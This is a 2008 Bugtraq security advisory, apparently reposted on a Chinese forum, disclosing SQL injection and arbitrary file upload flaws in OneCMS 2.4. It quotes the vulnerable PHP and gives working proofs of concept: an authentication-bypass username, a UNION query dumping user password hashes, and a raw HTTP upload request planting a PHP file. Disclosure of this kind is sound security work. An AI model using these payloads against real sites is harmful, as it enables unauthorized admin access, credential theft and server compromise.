OneCMS Vulnerabilities

看板Bugtraq作者admin.時間18年前 (2008/01/07 23:54)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/3 (看更多)

########################## WwW.BugReport.ir ########################## # # AmnPardaz Security Research Team # # Title: OneCMS Vulnerabilities # Vendor: http://www.insanevisions.com # Bugs: SQL Injection (Authentication bypass) , Arbitrary file upload! # Vulnerable Version: 2.4 (prior versions also may be affected) # Exploitation: Remote with browser # Fix Available: No! ###################################################################### #################### - Description: #################### quote from vendor: "OneCMS is an Open Source CMS also released under =20 GPL allowing users to run there own game site easily. From the powerful template system to top-notch support, OneCMS is a =20 great option for gaming sites." #################### - Vulnerability: #################### +-->Multiple SQL Injection vulnerabilities (authentication bypass) Code Snippet: a_login.php Line#5-12 if ($_GET['login'] =3D=3D "yes") { $usernameb =3D strip_tags(stripcslashes($_POST['username'])); $passwordc =3D $_POST['password']; $passwordb =3D md5($passwordc); $sql =3D mysql_query("SELECT * FROM onecms_users WHERE username =3D =20 '".$usernameb."' AND password =3D '".$passwordb."'"); $login_check =3D mysql_num_rows($sql); $usernameb is prone to sql injection vulnerability therefore its =20 possible for a remote attacker to bypass login form regardless of =20 magic quotes setting! POC : Username: admin' or 1=3D1 /* Password: something afterward program redirects user to another location via header() and =20 so (this behavior makes an infinite loop condition) but still its =20 possible to do administration tasks such as file upload! ------------------------------------ Code Snippet: staff.php Line#30-31 $result =3D mysql_query("SELECT * FROM onecms_profile WHERE username =3D =20 '".$_GET['user']."'"); $profile =3D mysql_fetch_row($result); POC: http://localhost/OneCMS_v2.4/staff.php?user=3Daaa' union select =20 1,username,password,1,1,1,1,1,1,1,1,1,1 from onecms_users/* condition: magic_quotes_gpc =3D Off +--> Arbitrary file upload! Code Snippet: a_upload.php Line#472-475 if ($_FILES["ss_$i"]["name"]) { if (((((($_FILES["ss_$i"]["type"] =3D=3D "image/jpeg") or =20 ($_FILES["ss_$i"]["type"] =3D=3D "image/gif") or ($_FILES["ss_$i"]["type"] = =20 =3D=3D "image/bmp") or ($_FILES["ss_$i"]["type"] =3D=3D "image/png") && =20 ($_FILES["ss_$i"]["type"])))))) { copy ($_FILES["ss_$i"]["tmp_name"], "$path/".$_FILES["ss_$i"]["name"].""); As shown above Its possible to upload arbitrary files (ex: .php) with =20 image/gif content type as a valid image file! POC: POST /OneCMS_v2.4/a_upload.php?view=3Dadd2 HTTP/1.0 Cookie: username=3Dadmin'or 1=3D1/*; =20 password=3D96e79218965eb72c92a549dd5a330112; login_date=3D1199693273; =20 style=3DTrend -----------------------------7d84115025c Content-Disposition: form-data; name=3D"ss_1"; =20 filename=3D"C:\path\to\file\test.php" Content-Type: image/gif <? phpinfo(); ?> -----------------------------7d84115025c Content-Disposition: form-data; name=3D"ss2_1" -----------------------------7d84115025c Content-Disposition: form-data; name=3D"type_1" image -----------------------------7d84115025c Content-Disposition: form-data; name=3D"muche" 1 -----------------------------7d84115025c Content-Disposition: form-data; name=3D"Submit" Upload -----------------------------7d84115025c-- #################### - Credit : #################### Original Advisory: http://www.bugreport.ir/?/26 AmnPardaz Security Research Team Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 admin. 的文章

文章代碼(AID): #17Waih00 (Bugtraq)